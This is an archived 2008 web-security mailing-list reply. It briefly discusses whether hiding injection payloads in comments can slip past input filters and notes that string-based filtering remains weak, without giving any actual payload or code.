[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] XSS/injection/... evading technique

From: Nick Gearls <nickgearls@xxxxxxxxx>
Subject: Re: [WEB SECURITY] XSS/injection/... evading technique
Date: Fri, 25 Jul 2008 17:24:55 +0200

> While nesting attack payloads inside of Comments may indeed help to
> bypass basic filters that remove/ignore this data after
> normalization, this same transport area will effectively prevent the
> back-end system from executing it because it skips over the Comment
> data.
Not if you enclose the commenting characters in a string

Anyway, we see no real solution with string parsers, although MultiMatch (before and after) may enhance the situation.

Nick


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

References:
- [WEB SECURITY] XSS/injection/... evading technique
  - From: Nick Gearls
- Re: [WEB SECURITY] XSS/injection/... evading technique
  - From: Ryan Barnett

Prev by Date: Re: [WEB SECURITY] XSS/injection/... evading technique
Next by Date: Re: [WEB SECURITY] Web Application Security Professionals Survey (July 2008)
Previous by thread: Re: [WEB SECURITY] XSS/injection/... evading technique
Next by thread: [WEB SECURITY] Administrative: Mail Server Issues
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site